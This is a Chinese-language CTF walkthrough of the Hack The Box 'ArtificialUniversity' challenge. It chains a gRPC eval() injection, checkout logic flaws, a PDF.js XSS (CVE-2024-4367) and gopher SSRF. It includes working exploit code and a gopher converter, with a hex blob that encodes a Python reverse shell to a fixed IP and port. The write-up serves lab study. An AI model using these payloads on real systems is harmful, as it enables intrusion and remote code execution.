Hack The Box INSANE难度靶场：ArtificialUniversity 漏洞分析与利用教学<\/h1>

1. 靶场概述<\/h2>

ArtificialUniversity是Hack The Box上INSANE难度的Web挑战题目，模拟了一个在线教育平台的课程商城模块。该靶场由两个主要组件构成：<\/p>

gRPC服务<\/strong>：product_api服务，运行在50051端口<\/li>

Flask Web应用<\/strong>：store商城Web界面，运行在1337端口<\/li> <\/ol>
对外只开放Web端口(1337)，需要通过Web应用找到触发gRPC机制的方法来完成题目，最终目标是实现远程代码执行(RCE)。<\/p>
2. gRPC服务漏洞分析<\/h2>
2.1 关键漏洞点<\/h3>
在api.py<\/code>中发现以下关键函数：<\/p>
GenerateProduct函数<\/strong>：包含eval()<\/code>调用，存在代码执行风险<\/p> 只有GetNewProducts<\/code>函数调用了GenerateProduct<\/code><\/li> 需要控制price_formula<\/code>参数才能利用<\/li> <\/ul> <\/li> UpdateService函数<\/strong>：可以修改键值对属性<\/p> 被对外函数DebugService<\/code>调用<\/li> DebugService<\/code>接收客户端参数并调用UpdateService<\/code><\/li> <\/ul> <\/li> <\/ol> 2.2 利用链构造<\/h3> 构造以下利用链：<\/p> 调用DebugService<\/code>修改price_formula<\/code>为恶意命令<\/li> 调用GetNewProducts<\/code>触发eval<\/code>执行<\/li> <\/ol> 2.3 漏洞利用代码<\/h3> import<\/span> grpc <\/span><\/span>import<\/span> product_pb2 <\/span><\/span>import<\/span> product_pb2_grpc <\/span><\/span>from<\/span> google.protobuf.struct_pb2 import<\/span> Struct <\/span><\/span> <\/span><\/span>def<\/span> exploit<\/span>(): <\/span><\/span> # 连接到gRPC服务<\/span> <\/span><\/span> channel =<\/span> grpc.<\/span>insecure_channel('127.0.0.1:50051'<\/span>) <\/span><\/span> stub =<\/span> product_pb2_grpc.<\/span>ProductServiceStub(channel) <\/span><\/span> <\/span><\/span> # 构造恶意请求，设置price_formula为命令执行代码<\/span> <\/span><\/span> merge_request =<\/span> product_pb2.<\/span>MergeRequest() <\/span><\/span> merge_request.<\/span>input['price_formula'<\/span>].<\/span>string_value =<\/span> "__import__('os').system('touch \/tmp\/pwn')"<\/span> <\/span><\/span> <\/span><\/span> # 使用DebugService修改price_formula<\/span> <\/span><\/span> print("[*] Sending malicious DebugService request..."<\/span>) <\/span><\/span> stub.<\/span>DebugService(merge_request) <\/span><\/span> <\/span><\/span> # 调用GetNewProducts触发eval执行<\/span> <\/span><\/span> print("[*] Triggering GenerateProduct to execute the payload..."<\/span>) <\/span><\/span> response =<\/span> stub.<\/span>GetNewProducts(product_pb2.<\/span>Empty()) <\/span><\/span> print("Response received:"<\/span>, response) <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> exploit() <\/span><\/span><\/code><\/pre>2.4 生成gRPC模块<\/h3> 使用项目自带的proto文件生成gRPC模块：<\/p> python -m grpc_tools.protoc -I. --python_out=<\/span>. --grpc_python_out=<\/span>. product.proto <\/span><\/span><\/code><\/pre>3. Web应用漏洞分析<\/h2> 3.1 \/checkout\/success接口漏洞<\/h3> 在\/checkout\/success<\/code>接口发现可疑操作：<\/p> 满足条件if amt_paid >= order.price<\/code>后会自动传入admin账号密码调用bot_runner<\/code><\/li> bot_runner<\/code>模拟Firefox浏览器访问获取支付订单PDF<\/li> payment_id<\/code>参数可控，可构造payment_id=.admin\/xxx<\/code>实现admin接口访问<\/li> <\/ul> 3.2 \/checkout接口逻辑漏洞<\/h3> \/checkout<\/code>接口存在奇怪的逻辑：<\/p> 传入product_id<\/code>会生成默认订单<\/li> 不传product_id<\/code>但包含完整参数(price<\/code>, title<\/code>, user_id<\/code>, email<\/code>)可绕过登录验证<\/li> 可创建price为负数的订单<\/li> <\/ol> 利用步骤：<\/p> 登录后访问\/subs<\/code>获取创建负数价格订单的order_id<\/li> 结合\/checkout\/success<\/code>实现admin接口访问：\/checkout\/success?order_id=6&payment_id=admin\/xxx<\/code><\/li> <\/ol> 3.3 \/admin\/view-pdf接口<\/h3> 在admin接口下找到view-pdf<\/code>接口，可根据URL参数预览PDF内容。<\/p> 3.4 PDF.js XSS漏洞利用<\/h3> 利用PDF.js的XSS漏洞(CVE-2024-4367)构造自动跳转并携带POST内容的payload：<\/p> 服务器模拟Firefox打开PDF时可实现发送POST请求<\/li> 可访问\/admin\/api-health<\/code>等接口<\/li> <\/ul> 4. 组合利用实现RCE<\/h2> 4.1 \/admin\/api-health接口<\/h3> api-health<\/code>接口通过POST请求调用get_url_status_code<\/code>函数：<\/p> 使用subprocess<\/code>模块模拟终端curl请求<\/li> 可构造gopher协议攻击内网gRPC服务<\/li> <\/ul> 4.2 gRPC请求转gopher协议<\/h3> 本地运行api.py<\/code>并用Wireshark捕获exp执行过程<\/li> 复制请求部分的raw数据<\/li> 使用转换脚本生成gopher URL：<\/li> <\/ol> import<\/span> binascii <\/span><\/span>import<\/span> urllib.parse <\/span><\/span> <\/span><\/span>def<\/span> hex_to_gopher<\/span>(hex_str: str) -><\/span> str: <\/span><\/span> # 清理非Hex字符<\/span> <\/span><\/span> cleaned =<\/span> hex_str.<\/span>replace("<\/span>\n<\/span>"<\/span>, ""<\/span>).<\/span>strip() <\/span><\/span> <\/span><\/span> # 验证Hex长度<\/span> <\/span><\/span> if<\/span> len(cleaned) %<\/span> 2<\/span> !=<\/span> 0<\/span>: <\/span><\/span> raise<\/span> ValueError<\/span>("无效的Hex长度"<\/span>) <\/span><\/span> <\/span><\/span> try<\/span>: <\/span><\/span> binary =<\/span> binascii.<\/span>unhexlify(cleaned) <\/span><\/span> except<\/span> binascii.<\/span>Error as<\/span> e: <\/span><\/span> raise<\/span> ValueError<\/span>(f<\/span>"Hex解码失败: <\/span>{<\/span>str(e)}<\/span>"<\/span>) <\/span><\/span> <\/span><\/span> # 基础协议验证<\/span> <\/span><\/span> if<\/span> not<\/span> binary.<\/span>startswith(b<\/span>'PRI * HTTP\/2.0<\/span>\r\n\r\n<\/span>SM<\/span>\r\n\r\n<\/span>'<\/span>): <\/span><\/span> raise<\/span> ValueError<\/span>("无效的HTTP\/2魔术字节"<\/span>) <\/span><\/span> <\/span><\/span> # 生成gopher URL<\/span> <\/span><\/span> encoded =<\/span> urllib.<\/span>parse.<\/span>quote(binary, safe=<\/span>''<\/span>) <\/span><\/span> return<\/span> f<\/span>"gopher:\/\/127.0.0.1:50051\/_<\/span>{<\/span>encoded}<\/span>"<\/span> <\/span><\/span> <\/span><\/span># 输入数据(已清理的连续Hex)<\/span> <\/span><\/span>raw_hex =<\/span> """505249202a20485454502f322e300d0a0d0a534d0d0a0d0a000024040000000000000200000000000300000000000400400000000500400000000600004000fe0300000001000004080000000000003f00010000000401000000000000e101040000000140053a70617468242f70726f647563742e50726f64756374536572766963652f446562756753657276696365400a3a617574686f726974790f6c6f63616c686f73743a35303035318386400c636f6e74656e742d74797065106170706c69636174696f6e2f677270634002746508747261696c6572734014677270632d6163636570742d656e636f64696e67176964656e746974792c206465666c6174652c20677a6970400a757365722d6167656e7430677270632d707974686f6e2f312e37302e3020677270632d632f34352e302e3020286c696e75783b2063687474703229000004080000000001000000050000ce00010000000100000000c90ac6010a0d70726963655f666f726d756c6112b4010ab1015f5f696d706f72745f5f28276f7327292e73797374656d2827707974686f6e33202d63205c27696d706f727420736f636b65742c6f732c7074793b733d736f636b65742e736f636b657428293b732e636f6e6e6563742828223137322e31372e302e31222c3637363729293b5b6f732e6475703228732e66696c656e6f28292c66642920666f7220666420696e2028302c312c32295d3b7074792e737061776e28222f62696e2f6261736822295c272729000004080000000000000000050000080601000000002c20317a14a3fad2000008060000000000deac00f8ef07f63c00003501040000000340053a70617468262f70726f647563742e50726f64756374536572766963652f4765744e657750726f6475637473c38386c2c1c0bf0000040800000000030000000500000500010000000300000000000000040800000000000000000500000806010000000049be420c8749b031"""<\/span> <\/span><\/span> <\/span><\/span>try<\/span>: <\/span><\/span> # 生成URL<\/span> <\/span><\/span> gopher_url =<\/span> hex_to_gopher(raw_hex) <\/span><\/span> print("成功生成gopher URL:"<\/span>) <\/span><\/span> print(gopher_url) <\/span><\/span>except<\/span> ValueError<\/span> as<\/span> e: <\/span><\/span> print("错误:"<\/span>, str(e)) <\/span><\/span><\/code><\/pre>4.3 完整利用步骤<\/h3> 准备阶段<\/strong>：<\/p> 使用Wireshark捕获反弹shell的gRPC请求<\/li> 转换raw数据为gopher协议URL<\/li> 制作自动跳转PDF（包含XSS payload）<\/li> <\/ul> <\/li> 攻击阶段<\/strong>：<\/p> 将PDF放在可访问的VPS上<\/li> 开启nc监听反弹shell<\/li> 创建price为负数的订单<\/li> 访问\/checkout\/success<\/code>触发PDF访问<\/li> <\/ul> <\/li> 结果获取<\/strong>：<\/p> 通过反弹shell获取flag<\/li> <\/ul> <\/li> <\/ol> 5. 参考资源<\/h2> FreeBuf文章：HTB ArtificialUniversity靶场解析<\/a><\/li> 腾讯云开发者：gRPC安全分析<\/a><\/li> <\/ol>